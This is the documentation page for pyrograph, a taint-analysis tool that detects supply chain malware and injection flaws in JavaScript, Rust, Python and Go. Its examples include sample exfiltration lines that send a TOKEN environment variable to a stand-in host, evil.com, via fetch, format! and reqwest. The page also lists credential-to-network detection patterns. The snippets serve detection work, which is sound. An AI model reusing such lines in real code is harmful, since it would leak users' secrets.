pyrograph 0.1.0

GPU-accelerated taint analysis for supply chain malware detection
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

# pyrograph

GPU-accelerated taint analysis for multi-language supply chain security.

## What it does

pyrograph parses source code (JavaScript, TypeScript, Rust, Python, Go), builds a taint graph of data flows, and identifies dangerous source→sink paths. It detects supply chain malware (credential theft, reverse shells, data exfiltration) and application vulnerabilities (SQL injection, command injection, XSS) through static data-flow analysis.

## Languages

- **JavaScript/TypeScript** — full ES2024 via SWC parser. Handles: arrow functions, template literals, destructuring, async/await, generators, Proxy, Promise chains, class methods, decorators.
- **Rust** — full edition 2024 via syn parser. Handles: closures, async/await, trait impls, match arms, format! macros, method chains, function pointer indirection, `&mut` reverse taint flow.
- **Python** — full 3.12 via rustpython-parser. Handles: f-strings, comprehensions, decorators, walrus operator, match/case, class methods, `__getattr__`/`__del__`, generators, async.
- **Go** — full via tree-sitter. Handles: goroutines, interfaces, channels, defer, select, method sets.

## Taint coloring

Not all source→sink flows are dangerous. `process.env.PORT → server.listen()` is normal configuration. `process.env.TOKEN → fetch("https://evil.com")` is credential theft.

pyrograph uses **category-aware taint coloring**: each source and sink has a category (credential, file, network, exec, sql, xss). Only specific category combinations trigger findings:

- `credential → network` = exfiltration
- `file → network` = data theft
- `http → sql` = SQL injection
- `http → exec` = command injection
- `network-input → exec` = remote code execution

35+ dangerous combinations, each with dedicated severity scoring.

## Features

- **Sanitizer modeling**`parseInt`, `JSON.parse`, `path.basename` break taint chains
- **Interprocedural analysis** — taint flows through function calls, closures, and return values
- **`&mut` reverse flow**`read_to_string(&mut buf)` taints `buf` (Rust-specific)
- **Format macro propagation**`format!("http://evil.com/{}", secret)` carries taint
- **GPU evaluation** — taint graph BFS runs on GPU via wgpu compute shaders
- **TOML-configurable labels** — add custom sources, sinks, and sanitizers without code changes

## Example

```rust
use pyrograph::parse::rust::parse_rust;
use pyrograph::analyze;

let code = r#"
    let token = std::env::var("TOKEN").unwrap();
    reqwest::Client::new().post("https://evil.com").body(token).send();
"#;

let graph = parse_rust(code, "malware.rs")?;
let findings = analyze(&graph)?;
assert!(!findings.is_empty()); // credential → network detected
```

## License

MIT